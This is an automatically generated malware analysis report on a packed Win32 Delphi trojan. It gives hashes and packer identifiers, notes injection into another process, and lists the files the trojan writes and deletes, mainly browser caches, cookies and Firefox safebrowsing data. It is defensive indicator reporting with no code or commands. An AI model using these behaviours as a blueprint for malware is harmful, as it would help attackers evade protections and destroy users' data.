Trojan.Win32.Delphi_06349e57f9

by malwarelabrobot on October 7th, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 06349e57f9fa8822f9686a8b25b38d21
SHA1: cd4d388bce555677c56daaae05d5a1678f1aafe1
SHA256: 46d60ad45117a8d849681a4eb96cf1992d44f84bd37a444ce4d032795bd7d71d
SSDeep: 12288:hxRUW380ZKtPEozzQwTRrMTzwuLsBiNVi0JZH6rhfXopP2WVWCvJf6TeI:hxRt7glEoRZMBLSiN0wphpvJCL
Size: 838144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company:
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2748

The Trojan injects its code into the following process(es):

ICZM.exe:1388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ICZM.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Windows\System32\581eb\CDClient_EX.sys (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll (35264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll (213 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\4BFD7.txt (155 bytes)
C:\LOG1.txt (1536 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Windows\System32\CDCLOG.txt (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (81472 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\System32\4BFD7.dat (4 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\advert[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Windows\System32\581eb\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Windows\System32\AdN\ÅäÖÃ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Windows\System32\4BFD7.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
